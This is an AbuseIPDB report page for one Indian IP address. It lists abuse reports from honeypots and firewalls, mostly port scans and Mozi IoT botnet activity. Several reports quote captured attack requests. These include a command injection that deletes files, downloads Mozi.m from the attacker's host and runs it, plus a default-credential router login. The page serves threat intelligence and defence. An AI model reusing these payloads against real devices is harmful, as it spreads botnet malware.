JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 103.99.196.2

103.99.196.2 was found in our database!

This IP was reported 370 times. Confidence of Abuse is 100%: ?

100%

ISP	Skynet Broadband
Usage Type	Fixed Line ISP
ASN	AS141275
Hostname(s)	dynamic.maxnetdigital.in
Domain Name	skynetbroadband.com.au
Country	🇮🇳 India
City	Delhi, Delhi

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 103.99.196.2

Whois 103.99.196.2

IP Abuse Reports for 103.99.196.2:

This IP address has been reported a total of 370 times from 126 distinct sources. 103.99.196.2 was first reported on June 29th 2025, and the most recent report was 1 hour ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇬🇧 PeravixGroup	2026-06-21 00:45:28 (1 hour ago)	Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8080. Severity: CRI ... show more Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8080. Severity: CRITICAL. Aaran.cloud show less	Hacking IoT Targeted
🇫🇷 vtchost.com	2026-06-20 18:14:56 (7 hours ago)	Jun 20 20:14:55 vtchost kernel: [125609.923169] PORTSCAN: IN=eth0 OUT= MAC=00:50:56:41:75:31:c0:69:1 ... show more Jun 20 20:14:55 vtchost kernel: [125609.923169] PORTSCAN: IN=eth0 OUT= MAC=00:50:56:41:75:31:c0:69:11:cd:47:2d:08:00 SRC=103.99.196.2 DST=161.97.181.152 LEN=60 TOS=0x00 PREC=0x00 TTL=45 ID=45205 DF PROTO=TCP SPT=34076 DPT=8443 WINDOW=5808 RES=0x00 SYN URGP=0 ... show less	Port Scan
🇩🇪 anycast_ac	2026-06-20 12:34:19 (13 hours ago)	[mirai-detector honeypot] Inbound attack against our honeypot on tcp/8443 (generic). Commands captur ... show more [mirai-detector honeypot] Inbound attack against our honeypot on tcp/8443 (generic). Commands captured: $ GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.99.196.2:39532/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m HTTP/1.0 show less	DDoS Attack IoT Targeted Brute-Force
🇨🇭 SOC [GOLINE SA]	2026-06-20 08:03:26 (18 hours ago)	FortiGate detected IPS attack from IPv4 address 103.99.196.2	Hacking
🇦🇹 urnilxfgbez	2026-06-19 22:45:00 (1 day ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan
🇺🇸 RAP	2026-06-19 18:42:24 (1 day ago)	2026-06-19 18:42:24 UTC Unauthorized activity to TCP port 8080. Web App	Port Scan Web App Attack
🇩🇪 Yachiyo Runami	2026-06-18 21:54:44 (2 days ago)	Port Scan on Honeypot \| Ports: 80/HTTP \| Proto: TCP(1) \| Flags: all SYN \| TTL: 40 \| Len: 60B \| Win: ... show more Port Scan on Honeypot \| Ports: 80/HTTP \| Proto: TCP(1) \| Flags: all SYN \| TTL: 40 \| Len: 60B \| Win: 5760(1) \| rDNS: dynamic.maxnetdigital.in \| F2B/ufw-honeypot@2026-06-18T21:54:44Z show less	Port Scan Hacking
🇺🇸 RAP	2026-06-18 04:55:20 (2 days ago)	2026-06-18 04:55:20 UTC Unauthorized activity to TCP port 8080. Web App	Port Scan Web App Attack
🇨🇭 GAS	2026-06-17 18:49:13 (3 days ago)	Bad Bot. 103.99.196.2 - - [17/Jun/2026:20:49:12 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/t ... show more Bad Bot. 103.99.196.2 - - [17/Jun/2026:20:49:12 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 392 "-" "-" "-" "-" ... show less	Bad Web Bot Web App Attack
🇫🇮 6kilowatti	2026-06-17 11:14:07 (3 days ago)	2026-06-17T14:14:06.413753+03:00 6kw kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:b6:e7:09:78:9a:18 ... show more 2026-06-17T14:14:06.413753+03:00 6kw kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:b6:e7:09:78:9a:18:bd:57:7e:08:00 SRC=103.99.196.2 DST=5.61.88.83 LEN=60 TOS=0x00 PREC=0x00 TTL=44 ID=1078 DF PROTO=TCP SPT=33825 DPT=52869 WINDOW=5808 RES=0x00 SYN URGP=0 ... show less	Port Scan
🇬🇷 ggb_st	2026-06-16 13:05:42 (4 days ago)	[2026-06-16 13:05:41] 103.99.196.2 triggered a honeypot. Requested on port 80. URI: /boaform/admin/f ... show more [2026-06-16 13:05:41] 103.99.196.2 triggered a honeypot. Requested on port 80. URI: /boaform/admin/formLogin?username=admin&psd=admin, UA: ... show less	Bad Web Bot Brute-Force Web App Attack Hacking SQL Injection
🇫🇷 zulzeen	2026-06-16 03:39:29 (4 days ago)	[distribamap-0] Blocked by SysWarden Firewall [BLOCK] (Web Attack)	Hacking Web App Attack
🇬🇧 PeravixGroup	2026-06-16 02:59:18 (4 days ago)	Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8080. Severity: CRI ... show more Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8080. Severity: CRITICAL. Aaran.cloud show less	Hacking IoT Targeted
🇩🇪 Tamsweb	2026-06-15 17:48:02 (5 days ago)	Unauthorized connection attempt or scan from 103.99.196.2 on port 39394 ...	Port Scan
🇯🇵 Kinsei Engineering Inc.	2026-06-14 20:47:01 (6 days ago)	UFW:High-frequency access to non-released ports used by software with known vulnerabilities.	Port Scan

Showing 1 to 15 of 370 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 147.185.132.61

🇰🇷 220.127.148.6

🇨🇳 203.2.164.205

🇧🇷 200.149.213.242

🇫🇮 178.20.210.151

🇺🇸 147.185.132.159

🇳🇱 109.172.93.14

🇺🇸 64.62.156.40

🇩🇪 45.142.107.99

🇧🇪 34.38.65.12

🇺🇸 2600:1010:a122:bbfe:bcbf:5ea9:9f4b:260

🇺🇸 207.90.244.27

🇬🇧 185.247.137.12

🇹🇷 185.139.5.123

🇩🇪 159.65.112.25

🇭🇰 154.198.162.75

🇨🇦 147.182.146.84

🇯🇵 47.79.37.112

🇺🇸 44.223.101.56

🇮🇳 40.81.230.77